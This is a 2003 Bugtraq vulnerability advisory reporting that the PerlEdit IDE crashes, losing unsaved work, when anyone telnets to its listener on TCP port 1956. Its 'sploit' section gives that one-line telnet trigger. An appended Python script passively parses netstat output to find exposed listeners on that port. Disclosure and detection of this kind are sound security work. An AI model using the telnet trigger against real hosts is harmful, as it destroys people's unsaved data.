[30494] in bugtraq


PerlEdit

daemon@ATHENA.MIT.EDU (morning_wood)
Mon Jun 23 16:26:31 2003

From: "morning_wood" <se_cur_ity@hotmail.com>
To: "0day" <0day@nothackers.org>, <support@indigostar.com>
Date: Sat, 21 Jun 2003 01:47:20 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-ID: <Law11-OE29b1ZGI8tvG0004d19e@hotmail.com>

------------------------------------------------------------------
          - EXPL-A-2003-010 exploitlabs.com Advisory 010
------------------------------------------------------------------
                               -= PerlEdit =-


exploitlabs.com
June 21, 2003


Vulnerability:
--------------
Remote Buffer Overflow

Product:
--------
PerlEdit
http://www.indigostar.com/perledit.html
All versions to current ( 1.07 )

Description of product:
-----------------------
"PerlEdit is an IDE for Perl and a general-purpose text editor.
It includes a source code text editor with syntax highlighting
and a visual debugger."

screenshot: http://www.indigostar.com/perledit_screenshots.html  



VULNERABILITY / EXPLOIT
=======================

 Upon execution, PerlEdit binds to local TCP port 1956.
Connecting to it via Telnet, locally or remotely, causes the program
to crash, resulting in a total loss of unsaved data.

------------- 'sploit -------------------------

telnet host-running-perledit 1956

READY

( exit telnet ) remote perledit crashes.


 Further investigation may lead to more serious issues; I did not
pursue as this was bad enough.


Local:
------
yes


Remote:
-------
yes


Vendor Fix:
-----------
No fix on 0day


Vendor Contact:
---------------
support@indigostar.com - Concurrent with this advisory


Credits:
--------
Donnie Werner
http://exploitlabs.com
http://nothackers.org - Freedom of Voice - Freedom of Choice
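
Added example, not part of the original advisory: a passive check that reads `netstat -ano` output and reports whether anything is listening on TCP port 1956, and whether that listener is reachable from the network or only from loopback. It never connects to the port. The sample output, addresses and PIDs are constructed for illustration, and the function names are hypothetical.

```python
import re

PERLEDIT_PORT = 1956  # listener port named in the advisory

# Constructed sample of Windows `netstat -ano` output (not from the advisory).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    0.0.0.0:1956           0.0.0.0:0              LISTENING       2412
  TCP    127.0.0.1:1956         0.0.0.0:0              LISTENING       3100
  TCP    192.168.1.20:1956      192.168.1.77:4031      ESTABLISHED     2412
  TCP    192.168.1.20:19560     0.0.0.0:0              LISTENING       5000
  TCP    [::]:1956              [::]:0                 LISTENING       2412
"""

# Proto, local addr:port, foreign addr:port, state, PID
ROW = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$")


def classify(addr):
    """Return 'loopback' if only local clients can connect, else 'network'."""
    host = addr.strip("[]")
    if host.startswith("127.") or host == "::1":
        return "loopback"
    return "network"


def scan(netstat_text, port=PERLEDIT_PORT):
    """Return (listeners, peers) for the given local TCP port.

    listeners: list of (local_addr, exposure, pid) for LISTENING sockets
    peers:     list of remote endpoints with an ESTABLISHED connection
    """
    listeners, peers = [], []
    for line in netstat_text.splitlines():
        m = ROW.match(line)
        if not m or int(m.group(2)) != port:
            continue  # header, non-TCP row, or a different port (e.g. 19560)
        addr, _port, foreign, state, pid = m.groups()
        if state == "LISTENING":
            listeners.append((addr, classify(addr), int(pid)))
        elif state == "ESTABLISHED":
            peers.append(foreign)
    return listeners, peers


if __name__ == "__main__":
    found, connected = scan(SAMPLE_NETSTAT)
    for addr, exposure, pid in found:
        print(f"port {PERLEDIT_PORT} listening on {addr} ({exposure}), PID {pid}")
    for peer in connected:
        print(f"active connection to port {PERLEDIT_PORT} from {peer}")
```

A listener reported as `network` is reachable from other hosts unless a host or perimeter firewall blocks inbound TCP 1956.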
